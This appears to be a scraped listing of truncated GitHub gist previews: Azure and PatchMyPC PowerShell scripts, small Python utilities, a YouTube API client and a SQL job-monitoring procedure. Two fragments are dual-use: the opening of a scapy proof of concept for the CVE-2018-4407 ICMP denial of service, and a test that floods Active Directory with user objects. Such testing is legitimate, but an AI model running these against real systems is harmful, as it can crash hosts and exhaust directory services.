This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory=$false)] | |
| [string]$SubsID, | |
| [Parameter(Mandatory=$true)] | |
| [string]$RGName | |
| ) | |
| if($SubsID) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import csv | |
| import json | |
| data = {} | |
| final = [] | |
| csvFilePath = 'h2_prod_ok.csv' | |
| jsonFilePath = 'h2_prod_anomalies.json' | |
| fieldnames = ('Series', 'Time', 'Value') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Тест на исчерпание ресурсов AD на создание новых объектов (в данном случае объектов типа User) в AD. | |
| # Разработчики: | |
| # Илгиз Мамышев, mamyshev@outlook.com | |
| # Александр Станкевич, Stanvy@stanvy.com | |
| # v24.08.2017 upd 14.12.2019 | |
| $iStartNumber = 1 | |
| $iEndNumber = 500000000 | |
| $iItemsProcessed = 0 # Уже обработано объектов | |
| $strUserNamePrefix = "OTU1_" # OverflowTestUser |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"lastUpload":"2019-09-19T09:53:55.723Z","extensionVersion":"v3.4.2"} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while True: | |
| num = input("Enter a valid binary number (e.g. 0111010): ") | |
| try: | |
| result = int(num, 2) | |
| except ValueError: | |
| print("Wrong type, only a binary number") | |
| continue | |
| print(f"Decimal equivalent to {num} is {result}") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## WARNING!! DO NOT MANUALLY EDIT THIS SCRIPT IN THE ADMINISTRATOR CONSOLE. | |
| ## IT WILL BREAK THE SCRIPT EXECUTION ON THE CLIENT IF IT IS A SIGNED SCRIPT. | |
| <# | |
| .Synopsis | |
| Script used for application detection methods | |
| .Notes | |
| FileName: SoftwareDetectionScript.PS1 | |
| Author: PatchMyPC | |
| Contact: support@patchmypc.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| api_key = "###############" | |
| from apiclient.discovery import build | |
| youtube = build('youtube', 'v3', developerKey=api_key) | |
| def get_channel_videos(channel_id): | |
| res = youtube.channels().list(id=channel_id, | |
| part='contentDetails').execute() | |
| playlist_id = res['items'][0]['contentDetails']['relatedPlaylists']['uploads'] | |
| videos = [] | |
| next_page_token = None |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CREATE PROCEDURE dbo.CustomSQLJobMonitoring | |
| @JobName sysname | |
| , @RunTimeout int | |
| , @RunStatus int output | |
| , @StatusLog nvarchar(1024) output | |
| AS | |
| SET NOCOUNT ON | |
| --Verify that this job exists | |
| IF NOT EXISTS (SELECT 1 FROM msdb.dbo.sysjobs WHERE [name] = @JobName) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2018-4407 ICMP DOS | |
| from scapy.layers.inet import IPOption, TCP, IP | |
| from scapy.all import * | |
| if __name__ == '__main__': | |
| try: | |
| check_ip = sys.argv[1] | |
| print('CVE-2018-4407 ICMP DOS - ' + check_ip) | |
| for i in range(8, 20): |